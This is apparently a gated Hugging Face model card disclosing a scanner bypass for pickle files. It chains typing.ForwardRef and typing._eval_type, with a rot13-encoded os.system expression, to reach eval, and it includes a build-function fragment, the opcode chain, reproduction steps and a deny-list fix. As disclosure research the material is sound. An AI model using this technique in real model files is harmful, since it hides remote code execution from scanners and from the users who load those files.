You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.

Log in or Sign Up to review the conditions and access this model content.

typing.ForwardRef + _eval_type β€” Eval Chain

Security Research β€” Responsible Disclosure This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request β€” see gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner CRITICAL WARNING Bypassed?
modelaudit 0.2.37 0 2 Yes β€” 0 CRITICAL
picklescan 1.0.4 0 0 Yes
modelscan 0 0 Yes

Vulnerability

typing.ForwardRef is designed for forward references in type annotations. It stores a string expression and compiles it as a code object via compile(). When typing._eval_type(ref, globalns, localns) is called, it evaluates the stored expression via eval(expr, globalns, localns). Python auto-injects __builtins__ into empty namespaces, making __import__ available.

Neither typing.ForwardRef nor typing._eval_type is in ALWAYS_DANGEROUS_FUNCTIONS. The typing module has many legitimate uses in ML model metadata and cannot be wholesale banned.


Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

def build(cmd: str) -> bytes:
    payload_expr = f"__import__('os').system('{cmd}')"
    rot13_expr   = codecs.encode(payload_expr, "rot_13")

    ops = bytearray(b"\x80\x04")

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) β€” any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-typing-forwardref-eval
cd pickle-bypass-typing-forwardref-eval

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan β€” observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

Add "typing.ForwardRef" and "typing._eval_type" to ALWAYS_DANGEROUS_FUNCTIONS. These have no legitimate ML pickle use β€” forward references are resolved at import time, not during deserialization.

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently β€” the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.


Full Technical Writeup

typing.ForwardRef + _eval_type β€” Eval Chain

Score: 0 CRITICAL, 2 WARNING
Technique: Compile-then-eval chain via typing's type annotation machinery
Scanner version: modelaudit 0.2.37

Mechanism

typing.ForwardRef is designed for forward references in type annotations. It stores a string expression and compiles it as a code object via compile(). When typing._eval_type(ref, globalns, localns) is called, it evaluates the stored expression via eval(expr, globalns, localns). Python auto-injects __builtins__ into empty namespaces, making __import__ available.

Neither typing.ForwardRef nor typing._eval_type is in ALWAYS_DANGEROUS_FUNCTIONS. The typing module has many legitimate uses in ML model metadata and cannot be wholesale banned.

Pickle Structure

_codecs.encode(rot13_expr, 'rot_13')    β†’ payload_expr    [0 findings β€” SAFE_GLOBALS]
typing.ForwardRef(payload_expr)          β†’ ref object      [WARNING 1]
typing._eval_type(ref, None, None)       β†’ eval fires β†’ RCE [WARNING 2]

The payload expression is rot13-encoded in the pickle. _codecs.encode (SAFE_GLOBALS) decodes it at runtime. The strings __import__, os, system, and the command never appear as readable text in the pickle bytes.

Why Scanners Miss It

  • typing.ForwardRef and typing._eval_type are not in any ban list
  • The rot13 obfuscation hides the eval expression from string pattern matching
  • _codecs.encode is explicitly safe-listed (0 findings for the decode step)

Recommended Fix

Add "typing.ForwardRef" and "typing._eval_type" to ALWAYS_DANGEROUS_FUNCTIONS. These have no legitimate ML pickle use β€” forward references are resolved at import time, not during deserialization.


General Analysis β€” Security Research

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support